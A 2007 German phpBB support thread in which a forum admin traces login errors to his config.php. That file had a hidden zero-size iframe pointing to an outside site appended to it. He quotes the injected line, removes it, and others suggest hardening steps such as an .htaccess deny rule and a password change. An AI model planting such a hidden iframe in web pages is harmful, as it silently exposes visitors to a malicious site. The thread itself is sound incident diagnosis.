fehlermeldung login: headers already sent by

bill9000 · Beitrag von **bill9000** » 21.05.2007 13:07

so, hallo.

ich betreibe mehrere phpBB foren ,
bei zwei unterschiedlichen ( http://www.tv-record-forum.com/ und http://www.tv-record-forum.de/ )
bekomme ich seit eben folgende fehlermeldung:

Warning: Cannot modify header information - headers already sent by (output started at /home/www/ph551/html/phpBB2/config.php:19) in /home/www/ph551/html/phpBB2/includes/sessions.php on line 254

Warning: Cannot modify header information - headers already sent by (output started at /home/www/ph551/html/phpBB2/config.php:19) in /home/www/ph551/html/phpBB2/includes/sessions.php on line 255

Warning: Cannot modify header information - headers already sent by (output started at /home/www/ph551/html/phpBB2/config.php:19) in /home/www/ph551/html/phpBB2/includes/functions.php on line 941

nach benutzung der suchfunktion fand ich folgende (mir unzureichende) erklärung:
http://www.phpbb.de/doku/kb/headers_already_sent

unzureichend desshalb,
da ich garantiert keinerlei modifikation am forum durchgeführt habe;

Nach Modifikationen oder falschem Up-/Download von Dateien kann es vorkommen(...)

und schon gar nicht in beiden foren gleichzeitig.

am server wirds wohl auch nicht liegen,
da ein drittes forum reibungslos funktioniert.

frage:
1.)
ist dies ein "angriff von aussen"?
(das ich mir mit meinem forum-projekt nicht unbedingt nur freunde mache,
ist mir durchaus bewusst...)

und:
2.)
ist der fehler behebbar?

sowie:
3.)
ist dann das forum nicht ausreichend abgesichert?

p.s.: zudem ist mir aufgefallen,
dass die darstellung der beiden login-fehlerhaften foren ebenfalls fehlerhaft ist:
das forum ist um eine breite zeile nach unten versetzt

-ich bedanke mich schonmal für jegliche hilfe,
und stehe (ab 15:45h) für weitere fragen selbstverständlich zur verfügung.

bill9000 · Beitrag von **bill9000** » 21.05.2007 17:36

von hier kommt das problem:
"http://www.free20.com/portal/index.php"

denn,
die config.php sah so aus(passwoerter usw. weg-ge-ixt):

<?php

// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'sqlxxx';

$dbhost = 'hostxxx';
$dbname = 'usrxxx';
$dbuser = 'usrxxx';
$dbpasswd = 'usrpasswordxxx';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

der fett gedruckte teil wurde -wie auch immer- der config.php hinzugefügt;
wodurch der fehler dann auftrat.

"gelöst" habe ich das problem,
indem ich den fett gedruckten teil einfach gelöscht habe.

die frage 1.) und 2.) kann somit beantwortet werden:
1.)
ja, ein angriff von aussen, vermutl. von http://www.free20.com/

2.)
ja, durch löschen behebbar

und 3.)
nein, vermutlich ist das forum nicht aussreichen abgesichert.

ich werde mich also (weiterhin) selbst schlau machen,
was ich in punkto sicherheit noch verbessern kann.
(die aktuellste phpBB-version ist es bereits- daran kann es also nicht liegen.)

hat mir jemand nen tip,
durch welches rattenloch diese "free20.com-zeilen" zu der config.php hinzugekrochen sind?

Miriam · Beitrag von **Miriam** » 21.05.2007 18:28

Schaust Du hier -> Klick

bill9000 · Beitrag von **bill9000** » 21.05.2007 19:24

Miriam hat geschrieben:Schaust Du hier -> Klick

ich nehme einmal an,
du beziehst dich auf diese passage:

Knut77 hat geschrieben:Hi,
erstellt mal eine .htaccess Datei.

Und schreibt mal folgendes hinein...

<FilesMatch "\.php$" >
deny from all
</FilesMatch>
Die kommt in den includes Ordner.

Und fragt bei eurem Hoster nach Logfiles, und guckt ob einer sich über Ftp einloggt, außer ihr und die die Zugangsdaten haben dürfen.

zum "rattenloch stopfen".

...
-i.O. hab ich gemacht. (.htaccess erstellt und includes ordner hochgeladen).
des weiteren habe ich noch das ftp-passwort verändert.
(da ich keinen transfer im ftp-upload dokumentiert habe,
ist dies wohl nicht nötig gewesen...)

...wenn das problem wiederkehren sollte,
melde ich mich wieder.

bis dahin erstmal: danke.

Beitrag von **gn#36** » 21.05.2007 19:37

Zusätzlich würde ich noch die Schreibrechte überprüfen (nur der Avatarordner sollte vom Webserver beschreibbar sein) und außerdem ALLE Dateien des Forums austauschen, wer weiß ob da noch mehr drin rumgepfuscht worden ist...

Miriam · Beitrag von **Miriam** » 21.05.2007 19:46

Ich meinte eher das:

Dr.Death hat geschrieben:Vielleicht hast DU ja LOKAL auf DEINEM PC einen Virus ?

bill9000 · Beitrag von **bill9000** » 22.05.2007 18:57

Miriam hat geschrieben:Ich meinte eher das:
Dr.Death hat geschrieben:Vielleicht hast DU ja LOKAL auf DEINEM PC einen Virus ?

dass ich einen als "root" zum laufen gebracht habe, ist wohl eher unwahrscheinlich...
(werde aber -spasseshalber- mal einen virenscan vornehmen.)

bill9000 · Beitrag von **bill9000** » 10.06.2007 23:51

bill9000 hat geschrieben:
Miriam hat geschrieben:Schaust Du hier -> Klick
ich nehme einmal an,
du beziehst dich auf diese passage:
Knut77 hat geschrieben:Hi,
erstellt mal eine .htaccess Datei.

Und schreibt mal folgendes hinein...

<FilesMatch "\.php$" >
deny from all
</FilesMatch>
Die kommt in den includes Ordner.
.

Rückmeldung:

nachdem ich die .htaccess datei mit obigem inhalt

<FilesMatch "\.php$" >
deny from all
</FilesMatch>

erstellt und in den includes ordner hochgeladen habe,
ist das problem nicht wiedergekeht.(dank an knut77 !)

p.s.: und relevante viren, (trojaner, what ever) konnte ich auf meinem linux-system auch keine finden...

Miriam · Beitrag von **Miriam** » 11.06.2007 14:54

(fast) Analog: KB:sicher
Abschnitt "Installation" /Schutz der config.php mittels .htaccess